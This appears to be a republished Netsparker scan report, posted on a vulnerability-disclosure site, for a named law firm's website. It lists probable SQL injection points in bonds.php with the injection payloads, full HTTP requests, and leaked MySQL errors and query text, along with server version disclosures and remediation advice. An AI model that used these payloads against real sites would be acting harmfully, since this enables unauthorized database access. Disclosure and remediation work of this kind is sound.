SQL Injection, Database Error, CWE-89, CAPEC-66, peckshaffer.com, DORK, GHDB Report

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.peckshaffer.com/bonds.php?page=new...
SCAN DATE
 5/12/2011 11:47:25 AM
REPORT DATE
 6/20/2011 10:13:46 AM
SCAN DURATION
 00:03:17

Total Requests

Average Speed

req/sec.
7
identified
0
confirmed
4
critical
0
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind SQL Injection, Boolean SQL Injection, SQL Injection
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
57 %
LOW
43 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/bonds.php page GET [Probable] SQL Injection No
page GET [Probable] SQL Injection No
page GET [Probable] SQL Injection No
Keywords GET [Probable] SQL Injection No
Apache Version Disclosure No
PHP Version Disclosure No
page GET Database Error Message No
[Probable] SQL Injection

[Probable] SQL Injection
4 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%..

Parameters

Parameter Type Value
page GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Keywords GET 3
BondID GET 3

Request

GET /bonds.php?page='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Keywords=3&BondID=3 HTTP/1.1
Referer: http://www.peckshaffer.com/bonds.php?page=news
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:41 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 500
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR | 1064<BR>sql: SELECT DISTINCT(AboutusID) FROM aboutus WHERE IsActive='y' AND AboutusTitle LIKE 'bond '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' LIMIT 1
- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%..

Parameters

Parameter Type Value
page GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /bonds.php?page='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:43 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 500
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR | 1064<BR>sql: SELECT DISTINCT(AboutusID) FROM aboutus WHERE IsActive='y' AND AboutusTitle LIKE 'bond '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' LIMIT 1
- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%..

Parameters

Parameter Type Value
page GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Keywords GET 3

Request

GET /bonds.php?page='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Keywords=3 HTTP/1.1
Referer: http://www.peckshaffer.com/bonds.php?page=news
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:46 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 500
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR | 1064<BR>sql: SELECT DISTINCT(AboutusID) FROM aboutus WHERE IsActive='y' AND AboutusTitle LIKE 'bond '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' LIMIT 1
- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page=news&Keywords='%2B%20(select+convert(int,CHAR(95)%2BCHAR(3..

Parameters

Parameter Type Value
page GET news
Keywords GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
BondID GET 3

Request

GET /bonds.php?page=news&Keywords='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&BondID=3 HTTP/1.1
Referer: http://www.peckshaffer.com/bonds.php?page=news
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:48:14 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 5869
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<title>bonds : Peck Shaffer </title>

<meta name="keywords" content="Public

Finance

Tax

Exempt

Municipal

Attorney

Peck

Shaffer

Bond

Law

Housing

Underwriter

School

Sewer

Water

Merchant

Leasing

Health Care

Economic

Stadium

Bank

Trustee

Nonprofit

Rebate

Arbitrage Rebate" />
<meta name="description" content="Peck Shaffer is a national leader in municipal finance law, serving as bond, underwriter and bank counsel on tax-exempt financings." />

<link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.bonds.css" media="screen" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.bonds.css" media="print" />
<link rel="icon" type="image/png" href="/media/images/favicon.ico" />
<link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" />
<script src="_libs/libs.global.js" type="text/javascript"></script>
<script src="activex/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<!-- Header : Start -->
<div id="printHeader" class="printOnly">
<img src="/media/images/psw_logo_print.gif" title="Peck Shaffer" alt="Peck Shaffer" id="printLogo"/>

<img src="/media/images/printpages/eagle_sm.gif" title="Peck Shaffer" alt="Peck Shaffer" id="Eagle"/>

</div>

<div id="headerArea">
<div class="containWidth">
<form action="/search.php" method="get" id="globalSearch">
<ul>
<li><input type="image" src="/media/images/go.gif" value="true" title="Go" id="Go"/></li>
<li>
<label for="Search"><img src="/media/images/search.gif" alt="Search" title="Search" /></label>
<input type="text" name="q" id="Search"/>
</li>
<li><a href="/contact.php" title="Contact Us"><img src="/media/images/contact_us.gif" alt="Contact Us" title="Contact Us" /></a></li>
<li><a href="/home.php" title="Home"><img src="/media/images/home.gif" alt="Home" title="Home" /></a></li>
</ul>
</form>
</div>
</div>
<!-- Header : End -->
<!-- Body : Start -->

<h1><a href="home.php" title="Peck Shaffer"><span>Peck Shaffer</span></a></h1>
<!-- Nav : Start -->
<script type="text/javascript">
<!--
// Define Images
var aab_off = new Image();
var aab_over = new Image();

var about_off = new Image();
var about_over = new Image();

var people_off = new Image();
var people_over = new Image();

var services_off = new Image();
var services_over = new Image();

var offices_off = new Image();
var offices_over = new Image();

var news_off = new Image();
var news_over = new Image();

var careers_off = new Image();
var careers_over = new Image();

// Set Paths

aab_off.src = '/media/images/nav_aab_over.gif';
aab_over.src = '/media/images/nav_aab_over.gif';

about_off.src = '/media/images/nav_about_us.gif';
about_over.src = '/media/images/nav_about_us_over.gif';

people_off.src = '/media/images/nav_our_people.gif';
people_over.src = '/media/images/nav_our_people_over.gif';

services_off.src = '/media/images/nav_our_services.gif';
services_over.src = '/media/images/nav_our_services_over.gif';

offices_off.src = '/media/images/nav_offices.gif';
offices_over.src = '/media/images/nav_offices_over.gif';

news_off.src = '/media/images/nav_news.gif';
news_over.src = '/media/images/nav_news_over.gif';

careers_off.src = '/media/images/nav_careers.gif';
careers_over.src = '/media/images/nav_careers_over.gif';
-->
</script>

<div id="mainNav">
<ul>
<li><a href="/bonds.php?page=types" title="All About Bonds" onmouseover="rollover('aab','over')" onmouseout="rollover('aab','off')"><img src="/media/images/nav_aab_over.gif" alt="All About Bonds" title="All About Bonds" id="aab"/></a></li>
<li><a href="/about.php" title="About Us" onmouseover="rollover('about','over')" onmouseout="rollover('about','off')"><img src="/media/images/nav_about_us.gif" alt="About Us" title="About Us" id="about"/></a></li>
<li><a href="/people.php" title="Our People" onmouseover="rollover('people','over')" onmouseout="rollover('people','off')"><img src="/media/images/nav_our_people.gif" alt="Our People" title="Our People" id="people"/></a></li>
<li><a href="/services.php" title="Our Services" onmouseover="rollover('services','over')" onmouseout="rollover('services','off')"><img src="/media/images/nav_our_services.gif" alt="Our Services" title="Our Services" id="services"/></a></li>
<li><a href="/offices.php" title="Offices" onmouseover="rollover('offices','over')" onmouseout="rollover('offices','off')"><img src="/media/images/nav_offices.gif" alt="Offices" title="Offices" id="offices"/></a></li>
<li><a href="/news.php" title="News" onmouseover="rollover('news','over')" onmouseout="rollover('news','off')"><img src="/media/images/nav_news.gif" alt="News" title="News" id="news"/></a></li>
<li><a href="/careers.php" title="Careers" onmouseover="rollover('careers','over')" onmouseout="rollover('careers','off')"><img src="/media/images/nav_careers.gif" alt="Careers" title="Careers" id="careers"/></a></li>
</ul>
<div id="thisAd">THIS IS AN ADVERTISEMENT.</div>
</div>

<!-- Nav : End -->
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 | 1064<BR>sql: SELECT WordID FROM _search_words WHERE Word LIKE '%'+%'
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page=news

Extracted Version

2.0.46 (Red Hat)

Request

GET /bonds.php?page=news HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:24 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<title>bonds : Peck Shaffer </title>

<meta name="keywords" content="Public

Finance

Tax

Exempt

Municipal

Attorney

Peck

Shaffer

Bond

Law

Housing

Underwriter

School

Sewer

Water

Merchant

Leasing

Health Care

Economic

Stadium

Bank

Trustee

Nonprofit

Rebate

Arbitrage Rebate" />
<meta name="description" content="Peck Shaffer is a national leader in municipal finance law, serving as bond, underwriter and bank counsel on tax-exempt financings." />

<link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.bonds.css" media="screen" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.bonds.css" media="print" />
<link rel="icon" type="image/png" href="/media/images/favicon.ico" />
<link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" />
<script src="_libs/libs.global.js" type="text/javascript"></script>
<script src="activex/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<!-- Header : Start -->
<div id="printHeader" class="printOnly">
<img src="/media/images/psw_logo_print.gif" title="Peck Shaffer" alt="Peck Shaffer" id="printLogo"/>

<img src="/media/images/printpages/eagle_sm.gif" title="Peck Shaffer" alt="Peck Shaffer" id="Eagle"/>

</div>

<div id="headerArea">
<div class="containWidth">
<form action="/search.php" method="get" id="globalSearch">
<ul>
<li><input type="image" src="/media/images/go.gif" value="true" title="Go" id="Go"/></li>
<li>
<label for="Search"><img src="/media/images/search.gif" alt="Search" title="Search" /></label>
<input type="text" name="q" id="Search"/>
</li>
<li><a href="/contact.php" title="Contact Us"><img src="/media/images/contact_us.gif" alt="Contact Us" title="Contact Us" /></a></li>
<li><a href="/home.php" title="Home"><img src="/media/images/home.gif" alt="Home" title="Home" /></a></li>
</ul>
</form>
</div>
</div>
<!-- Header : End -->
<!-- Body : Start -->

<h1><a href="home.php" title="Peck Shaffer"><span>Peck Shaffer</span></a></h1>
<!-- Nav : Start -->
<script type="text/javascript">
<!--
// Define Images
var aab_off = new Image();
var aab_over = new Image();

var about_off = new Image();
var about_over = new Image();

var people_off = new Image();
var people_over = new Image();

var services_off = new Image();
var services_over = new Image();

var offices_off = new Image();
var offices_over = new Image();

var news_off = new Image();
var news_over = new Image();

var careers_off = new Image();
var careers_over = new Image();

// Set Paths

aab_off.src = '/media/images/nav_aab_over.gif';
aab_over.src = '/media/images/nav_aab_over.gif';

about_off.src = '/media/images/nav_about_us.gif';
about_over.src = '/media/images/nav_about_us_over.gif';

people_off.src = '/media/images/nav_our_people.gif';
people_over.src = '/media/images/nav_our_people_over.gif';

services_off.src = '/media/images/nav_our_services.gif';
services_over.src = '/media/images/nav_our_services_over.gif';

offices_off.src = '/media/images/nav_offices.gif';
offices_over.src = '/media/images/nav_offices_over.gif';

news_off.src = '/media/images/nav_news.gif';
news_over.src = '/media/images/nav_news_over.gif';

careers_off.src = '/media/images/nav_careers.gif';
careers_over.src = '/media/images/nav_careers_over.gif';
-->
</script>

<div id="mainNav">
<ul>
<li><a href="/bonds.php?page=types" title="All About Bonds" onmouseover="rollover('aab','over')" onmouseout="rollover('aab','off')"><img src="/media/images/nav_aab_over.gif" alt="All About Bonds" title="All About Bonds" id="aab"/></a></li>
<li><a href="/about.php" title="About Us" onmouseover="rollover('about','over')" onmouseout="rollover('about','off')"><img src="/media/images/nav_about_us.gif" alt="About Us" title="About Us" id="about"/></a></li>
<li><a href="/people.php" title="Our People" onmouseover="rollover('people','over')" onmouseout="rollover('people','off')"><img src="/media/images/nav_our_people.gif" alt="Our People" title="Our People" id="people"/></a></li>
<li><a href="/services.php" title="Our Services" onmouseover="rollover('services','over')" onmouseout="rollover('services','off')"><img src="/media/images/nav_our_services.gif" alt="Our Services" title="Our Services" id="services"/></a></li>
<li><a href="/offices.php" title="Offices" onmouseover="rollover('offices','over')" onmouseout="rollover('offices','off')"><img src="/media/images/nav_offices.gif" alt="Offices" title="Offices" id="offices"/></a></li>
<li><a href="/news.php" title="News" onmouseover="rollover('news','over')" onmouseout="rollover('news','off')"><img src="/media/images/nav_news.gif" alt="News" title="News" id="news"/></a></li>
<li><a href="/careers.php" title="Careers" onmouseover="rollover('careers','over')" onmouseout="rollover('careers','off')"><img src="/media/images/nav_careers.gif" alt="Careers" title="Careers" id="careers"/></a></li>
</ul>
<div id="thisAd">THIS IS AN ADVERTISEMENT.</div>
</div>

<!-- Nav : End -->
<script type="text/javascript">
<!--
/* define images */
var relatedNews = new Image();
var relatedNews_over = new Image();

var relatedEvents = new Image();
var relatedEvents_over = new Image();

var relatedArticles = new Image();
var relatedArticles_over = new Image();

var relatedSpeeches = new Image();
var relatedSpeeches_over = new Image();

var relatedArchive = new Image();
var relatedArchive_over = new Image();

var imgSignup = new Image();
var imgSignup_over = new Image();

/* set image paths */
relatedNews.src = '/media/images/bonds/news.gif';
relatedNews_over.src = '/media/images/bonds/news_over.gif';

relatedEvents.src = '/media/images/bonds/events.gif';
relatedEvents_over.src = '/media/images/bonds/events_over.gif';

relatedArticles.src = '/media/images/bonds/articles.gif';
relatedArticles_over.src = '/media/images/bonds/articles_over.gif';

relatedSpeeches.src = '/media/images/bonds/speeches.gif';
relatedSpeeches_over.src = '/media/images/bonds/speeches_over.gif';

relatedArchive.src = '/media/images/bonds/archive.gif';
relatedArchive_over.src = '/media/images/bonds/archive_over.gif';

imgSignup.src = '/media/images/news/sign_up.gif';
imgSignup_over.src = '/media/images/news/sign_up_over.gif';

-->
</script>

<!-- Bond_news : Start -->

<div id="secBar">
<div class="containWidth">

<script type="text/javascript"><!-- // define images var bondTypes_off = new Image(); var bondTypes_over = new Image(); var bondNews_off = new Image(); var bondNews_over = new Image(); var bondTool_off = new Image(); var bondTool_over = new Image(); var bondLinks_off = new Image(); var bondLinks_over = new Image(); var bondMap_off = new Image(); var bondMap_over = new Image(); // set image paths bondTypes_off.src = '/media/images/bond_types.gif'; bondTypes_over.src = '/media/images/bond_types_over.gif'; bondNews_off.src = '/media/images/bond_news_over.gif'; bondNews_over.src = '/media/images/bond_news_over.gif'; bondTool_off.src = '/media/images/bond_toolbox.gif'; bondTool_over.src = '/media/images/bond_toolbox_over.gif'; bondLinks_off.src = '/media/images/bond_links.gif'; bondLinks_over.src = '/media/images/bond_links_over.gif'; bondMap_off.src = '/media/images/deal_map.gif'; bondMap_over.src = '/media/images/deal_map_over.gif';--></script><div id="secNav"> <ul> <li><a href="/bonds.php?page=types" title="Bond Types" onmouseover="rollover('bondTypes','over')" onmouseout="rollover('bondTypes','off')"><img src="/media/images/bond_types.gif" alt="Bond Types" title="Bond Types" id="bondTypes"/></a></li> <li><a href="/bonds.php?page=news" title="Bond News &amp; Events" onmouseover="rollover('bondNews','over')" onmouseout="rollover('bondNews','off')"><img src="/media/images/bond_news_over.gif" alt="Bond News &amp; Event" title="Bond News &amp; Event" id="bondNews"/></a></li> <li><a href="/bonds.php?page=toolbox" title="Bond Toolbox" onmouseover="rollover('bondTool','over')" onmouseout="rollover('bondTool','off')"><img src="/media/images/bond_toolbox.gif" alt="Bond Toolbox" title="Bond Toolbox" id="bondTool"/></a></li> <li><a href="/bonds.php?page=links" title="Bond Links" onmouseover="rollover('bondLinks','over')" onmouseout="rollover('bondLinks','off')"><img src="/media/images/bond_links.gif" alt="Bond Links" title="Bond Links" id="bondLinks"/></a></li> <li><a href="/bonds_map.php" title="Deals On The Map" onmouseover="rollover('bondMap','over')" onmouseout="rollover('bondMap','off')"><img src="/media/images/deal_map.gif" alt="Deals On The Map" title="Deals On The Map" id="bondMap"/></a></li> </ul></div>
</div>
</div>

<div id="mainContent">
<div id="Pattern" class="printOnly">
<img src="/media/images/printpages/tile06.gif" title="Pattern" alt="Pattern" id="Pattern" />
</div>
<div id="container">
<div id="border">
<div id="Color" class="color"></div>
<div class="narrative">

<div id="Related" class="Center">
<a href="/bonds.php?page=news#News" title="News" onmouseover="rollover('relatedNews','over')" onmouseout="rollover('relatedNews','')"><img src="/media/images/bonds/news.gif" alt="News" title="News" id="relatedNews"/></a><img src="/media/images/bonds/red_dot.gif" alt="-" class="Dot"/><a href="/bonds.php?page=news#Articles" title="Publications" onmouseover="rollover('relatedArticles','over')" onmouseout="rollover('relatedArticles','')"><img src="/media/images/bonds/articles.gif" alt="Publications" title="Publications" id="relatedArticles"/></a> </div>

<h3>Bond News &amp; Events</h3>

<a name="News"></a>
<h5>News</h5>
<div class="Items">
<h6><a href="/bonds.php?NewsID=138&page=news" title="New National Bond Financing Program for Catholic Educational Institutions through the Colorado Educational and Cultural Facilities Authority">New National Bond Financing Program for Catholic Educational Institutions through the Colorado Educational and Cultural Facilities Authority</a></h6>


<span>2/4/2011</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=137&page=news" title="Housing Bonds Not Affected by Sunset for Exceptions for Federal Guarantees and AMT Exclusions">Housing Bonds Not Affected by Sunset for Exceptions for Federal Guarantees and AMT Exclusions</a></h6>


<span>12/22/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=136&page=news" title="Tax Bill Signed – But Several Muni Finance Provisions Not Extended">Tax Bill Signed – But Several Muni Finance Provisions Not Extended</a></h6>


<span>12/20/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=135&page=news" title="Peck Shaffer Participates in Three Bond Buyer Deals of the Year">Peck Shaffer Participates in Three Bond Buyer Deals of the Year</a></h6>


<span>12/15/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=131&page=news" title="Reminder: New SEC Amendments Effective December 1, 2010">Reminder: New SEC Amendments Effective December 1, 2010</a></h6>


<span>11/12/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=134&page=news" title=""Issue Date" of Draw-Down Loans">"Issue Date" of Draw-Down Loans</a></h6>


<span>11/30/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=130&page=news" title="SEC Begins Securing Civil Penalties Against Individual Municipal Officials for Misleading Financial Disclosures">SEC Begins Securing Civil Penalties Against Individual Municipal Officials for Misleading Financial Disclosures</a></h6>


<span>11/5/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=126&page=news" title="Decades-old Program Gains New Life">Decades-old Program Gains New Life</a></h6>


<span>10/10/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=125&page=news" title="Increased Internal Revenue Service Scrutiny of Build America Bonds De Minimis Premium Rule">Increased Internal Revenue Service Scrutiny of Build America Bonds De Minimis Premium Rule</a></h6>


<span>10/7/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=122&page=news" title="AMENDMENT 60, AMENDMENT 61 AND PROPOSITION 101 - Cause for Fiscal Uncertainty in Colorado's Future">AMENDMENT 60, AMENDMENT 61 AND PROPOSITION 101 - Cause for Fiscal Uncertainty in Colorado's Future</a></h6>


<span>7/9/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=120&page=news" title="SEC Amendments to Rule 15c2-12">SEC Amendments to Rule 15c2-12</a></h6>


<span>6/11/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=119&page=news" title="IRS Proposes Revised Compliance Quest..
PHP Version Disclosure

PHP Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page=news

Extracted Version

PHP/4.4.2

Request

GET /bonds.php?page=news HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:24 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<title>bonds : Peck Shaffer </title>

<meta name="keywords" content="Public

Finance

Tax

Exempt

Municipal

Attorney

Peck

Shaffer

Bond

Law

Housing

Underwriter

School

Sewer

Water

Merchant

Leasing

Health Care

Economic

Stadium

Bank

Trustee

Nonprofit

Rebate

Arbitrage Rebate" />
<meta name="description" content="Peck Shaffer is a national leader in municipal finance law, serving as bond, underwriter and bank counsel on tax-exempt financings." />

<link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.bonds.css" media="screen" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" />
<link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.bonds.css" media="print" />
<link rel="icon" type="image/png" href="/media/images/favicon.ico" />
<link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" />
<script src="_libs/libs.global.js" type="text/javascript"></script>
<script src="activex/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<!-- Header : Start -->
<div id="printHeader" class="printOnly">
<img src="/media/images/psw_logo_print.gif" title="Peck Shaffer" alt="Peck Shaffer" id="printLogo"/>

<img src="/media/images/printpages/eagle_sm.gif" title="Peck Shaffer" alt="Peck Shaffer" id="Eagle"/>

</div>

<div id="headerArea">
<div class="containWidth">
<form action="/search.php" method="get" id="globalSearch">
<ul>
<li><input type="image" src="/media/images/go.gif" value="true" title="Go" id="Go"/></li>
<li>
<label for="Search"><img src="/media/images/search.gif" alt="Search" title="Search" /></label>
<input type="text" name="q" id="Search"/>
</li>
